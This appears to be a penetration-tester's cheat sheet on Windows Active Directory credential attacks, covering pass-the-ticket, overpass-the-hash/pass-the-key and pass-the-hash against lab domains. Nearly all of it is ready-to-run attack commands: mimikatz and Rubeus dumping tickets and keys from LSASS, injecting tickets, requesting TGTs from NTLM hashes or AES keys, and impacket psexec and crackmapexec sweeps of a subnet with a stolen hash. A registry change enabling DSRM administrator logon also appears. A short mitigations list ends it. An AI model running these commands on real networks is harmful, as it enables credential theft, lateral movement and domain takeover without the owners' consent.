# PTH, PTT, Overpth, ptk

### Pass-the-Ticket

### **Harvesting tickets (mimikatz / Rubeus on Windows)**

```powershell
# Extract tickets with mimikatz (privilege::debug first, then export to .kirbi files)
privilege::debug
sekurlsa::tickets /export
# or with Rubeus
.\Rubeus.exe dump
```

### Inject ticket into current session

```powershell
kerberos::ptt [0;304edb]-2-0-40e10000-Administrator@krbtgt-WARGREY.MON.kirbi
klist
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
.\winrs.exe -r:<any other dc> cmd.exe
```

#### Rubeus

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi

.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
```

{% endcode %}

Reference: [Experimenting with Kerberos Ticket Formats](https://tw1sm.github.io)

***

### Overpass The Hash/Pass The Key (PTK)

### **Linux**

{% code overflow="wrap" %}

```bash
# Request a TGT with the NTLM hash (LM half left empty), then use the resulting ccache
impacket-getTGT hacktor.local/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/velociraptor.ccache
impacket-psexec hacktor.local/velociraptor@labwws02.jurassic.park -k -no-pass
```

{% endcode %}

### **Windows**

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt

.\PsExec.exe -accepteula \\labwws02.hacktor.local cmd
```

{% endcode %}

### Obtain encryption key

```powershell
# Dump Kerberos encryption keys (RC4 / AES128 / AES256) from LSASS
privilege::debug
sekurlsa::ekeys
```

#### RC4 algorithm

```powershell
sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:powershell.exe
```

#### AES128

```powershell
sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /aes128:b65ea8151f13a31d01377f5934bf3883 /run:powershell.exe
```

#### AES256

```powershell
sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:powershell.exe
```

```powershell
winrs.exe -r:<any other dc> cmd.exe
```

#### Using Rubeus

```powershell
Rubeus.exe asktgt /user:administrator /rc4:<ntlm hash> /ptt
Rubeus.exe asktgt /user:administrator /aes256:<aes256 key> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Rubeus.exe ptt /ticket:<base64 kirbi>
```

***

## Pass-the-hash

### Linux

#### Pass The Hash using crackmapexec or NXC

Since we already have the hashes, we can use them directly without cracking them. The crackmapexec command takes the protocol, the target(s), the user name and the NT hash:

```bash
crackmapexec smb TARGET_OR_RANGE -u "USER NAME" -H HASH --local-auth

# example
crackmapexec smb 192.168.37.0/24 -u "Frank Castle" -H 40739aa18503c6fcf8c7e9d434af2361 --local-auth
```

Running this attempts pass-the-hash against every targeted machine and reports which ones accepted the hash for the specified user.

<figure><img src="https://www.hackingloops.com/wp-content/uploads/2023/03/8-1024x147.png" alt="" height="105" width="735"><figcaption></figcaption></figure>

Here it does not say <mark style="color:orange;">**`Pwned`**</mark>**`!`**; instead we see a green plus sign **(+)**, which indicates that the credentials were accepted and there is a good chance the attack worked. `Pwned!` marks confirmed success (the user has administrative access on that host).

The same hash can then be used with <mark style="color:red;">**`psexec`**</mark> to get shell access:

{% code overflow="wrap" %}

```bash
impacket-psexec "USER NAME":@TARGET_IP -hashes FULL_NTLM_HASH

impacket-psexec "Frank Castle":@192.168.37.141 -hashes aad3b435b51404eeaad3b435b51404ee:40739aa18503c6fcf8c7e9d434af2361
```

{% endcode %}

<figure><img src="https://www.hackingloops.com/wp-content/uploads/2023/03/9.png" alt="" height="206" width="1009"><figcaption></figcaption></figure>

This tries to find a writable share, uploads a service binary and executes it to get a shell. Here the user "Frank Castle" authenticates successfully, but does not have admin access over the shares, so the shell is not obtained.

Trying the same command against another machine, 192.168.1.5, gives an authentication failure:

<figure><img src="https://www.hackingloops.com/wp-content/uploads/2023/03/10-1024x85.png" alt="" height="63" width="766"><figcaption></figcaption></figure>

This is because we are using local authentication. Frank Castle has access to this machine as a domain user, not as a local user. If, however, local authentication succeeds on a Domain Controller, we can do much more.

### Windows

```powershell
Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam" "exit"'
Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::msv" "exit"'
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD
```

```plaintext
mimikatz# token::revert
mimikatz# sekurlsa::pth /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /domain:pdc /run:powershell.exe
mimikatz# sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256 krbtgt hash> /run:powershell.exe
```

```powershell
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256 krbtgt hash> /run:cmd.exe" "exit"
```

```powershell
Rubeus.exe asktgt /user:SHALBY /rc4:5D88C6E440C1B976A9C1A2EF6AD66083 /ptt
Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
SafetyKatz.exe "sekurlsa::pth /user:user /domain:anything.domain.local /aes256:<> /run:cmd.exe" "exit"
```

```powershell
winrs -r:dc whoami
winrs -r:dc cmd
```

PtH authenticates to a host directly over NTLM: the password's hash is used to answer the NTLM challenge-response. Overpass-the-hash (OPtH) is subtler, because it uses the hash (or AES key) to request a Kerberos TGT, after which all further authentication looks like ordinary Kerberos.

### Mitigations for Pass The Hash/Password

Preventing these attacks completely is hard, but some controls make them much more difficult for attackers. The following are suggestions for limiting Pass The Hash/Password attacks:

* Limit account reuse
  * Do not reuse the local admin password
  * Disable Guest and Administrator accounts
  * Limit who is the local administrator
* Use strong passwords
  * Longer passwords
  * Do not use common words
* Privileged Access Management (PAM) limits Pass The Hash/Password attacks because the password/hash is strong and constantly rotated
  * Check out/in sensitive accounts only when needed
  * Automatically rotate passwords at each check out and check-in

## overPassTheHash

[Video Reference](https://youtu.be/EA2kod-okIg?si=t6s0OoxRsoGzRcWY)
